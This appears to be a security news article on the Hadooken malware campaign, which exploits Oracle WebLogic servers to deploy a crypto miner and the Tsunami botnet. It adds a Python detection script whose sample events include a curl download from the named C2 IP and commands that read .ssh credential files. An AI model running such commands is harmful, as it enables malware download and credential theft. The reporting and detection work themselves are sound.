Cybersecurity researchers have identified a new malware campaign targeting Linux environments, specifically exploiting Oracle WebLogic servers to conduct illicit cryptocurrency mining and deliver botnet malware. The malware, dubbed Hadooken, was uncovered by cloud security firm Aqua.
According to security researcher Assaf Moran, "When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner." The Tsunami botnet (also known as Kaiten) has a history of targeting Jenkins and WebLogic services in Kubernetes clusters.
The attack takes advantage of known security vulnerabilities and misconfigurations, including weak credentials, to gain an initial foothold and execute arbitrary code on compromised systems. The attackers utilize two nearly identical payloads, one written in Python and the other in a shell script, to download Hadooken from remote servers at IP addresses 89.185.85[.]102 and 185.174.136[.]204.
The shell script further escalates the attack by iterating over directories containing SSH data (user credentials, host information, secrets) and using this data to attack known servers. This enables the malware to move laterally across the organization or connected environments, thereby spreading further.
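The foothold-and-spread behaviour described in the two paragraphs above can be turned into process-level detection logic. The following is an added example, not Aqua's or the article's code; the event format is a constructed simplification of an EDR/auditd exec feed, and the only values taken from the article are the two download-server IPs.

```python
import os
import re

# The two download servers named in the article (defanged there with [.]).
HADOOKEN_C2 = {"89.185.85.102", "185.174.136.204"}
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# Interpreters and downloaders a WebLogic JVM has no business spawning directly.
SUSPICIOUS_CHILDREN = {"sh", "bash", "python", "python3", "curl", "wget"}


def _basename(cmd):
    return os.path.basename(cmd.split()[0])


def scan_events(events):
    """Return (pid, rule) alerts for a time-ordered list of process-exec events.

    Event format is constructed for this example (not from the article):
    {"pid": int, "ppid": int, "parent": str, "cmd": str}.
    """
    alerts = []
    ssh_harvesters = set()  # ppids of shells under which .ssh material was read
    for ev in events:
        pid, ppid, cmd, parent = ev["pid"], ev["ppid"], ev["cmd"], ev["parent"]
        head = _basename(cmd)
        # Rule 1: any command line touching the known Hadooken download hosts.
        if HADOOKEN_C2 & set(IP_RE.findall(cmd)):
            alerts.append((pid, "hadooken_c2_indicator"))
        # Rule 2: WebLogic's JVM spawning a shell, interpreter or downloader,
        # the initial-foothold step the article describes.
        if "weblogic" in parent.lower() and head in SUSPICIOUS_CHILDREN:
            alerts.append((pid, "weblogic_spawned_interpreter"))
        # Rule 3: lateral-movement pattern: a process under one shell reads
        # .ssh material, then a sibling under the same shell starts ssh/scp.
        if ".ssh" in cmd:
            ssh_harvesters.add(ppid)
        elif head in ("ssh", "scp") and ppid in ssh_harvesters:
            alerts.append((pid, "ssh_credential_reuse_lateral_movement"))
    return alerts


# Constructed sample telemetry: one infected WebLogic host plus one benign admin ssh.
WL = "java -Dweblogic.Name=AdminServer weblogic.Server"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "parent": "/bin/bash", "cmd": WL},
    {"pid": 200, "ppid": 100, "parent": WL, "cmd": "/bin/sh -c 'curl -O http://89.185.85.102/x.sh'"},
    {"pid": 201, "ppid": 200, "parent": "/bin/sh", "cmd": "find / -name .ssh -type d"},
    {"pid": 202, "ppid": 200, "parent": "/bin/sh", "cmd": "cat /home/deploy/.ssh/known_hosts"},
    {"pid": 203, "ppid": 200, "parent": "/bin/sh", "cmd": "ssh deploy@10.0.0.5 uname -a"},
    {"pid": 300, "ppid": 1, "parent": "/bin/bash", "cmd": "ssh admin@backup.internal"},
]

if __name__ == "__main__":
    for pid, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 3 deliberately keys on the parent shell rather than on the `ssh` binary alone, so routine administrator sessions (pid 300 above) stay quiet while a harvest-then-connect chain under one spawned shell is flagged.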
Hadooken is designed with two core functionalities: the cryptocurrency miner it deploys and the Tsunami (Kaiten) botnet malware it drops, as noted above.
Aqua's research also noted that the IP address 89.185.85[.]102 is registered to Aeza International LTD (AS210644) in Germany, which was previously associated with the 8220 Gang's cryptocurrency mining campaign. The gang exploited security flaws in Apache Log4j and Atlassian Confluence Server earlier in 2024. The second IP, 185.174.136[.]204, also linked to Aeza Group Ltd., is currently inactive but was identified as part of a bulletproof hosting service provider tied to Russian cybercrime networks.
Bulletproof hosting services, like Aeza, have become notorious for offering protection to cybercriminals by ignoring abuse reports, providing a safe haven for malware operations. A report by Qurium and EU DisinfoLab in July 2024 revealed Aeza's ties to Moscow-based servers and data centers in Frankfurt, enabling fast growth by recruiting young developers affiliated with the Russian cybercrime community.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067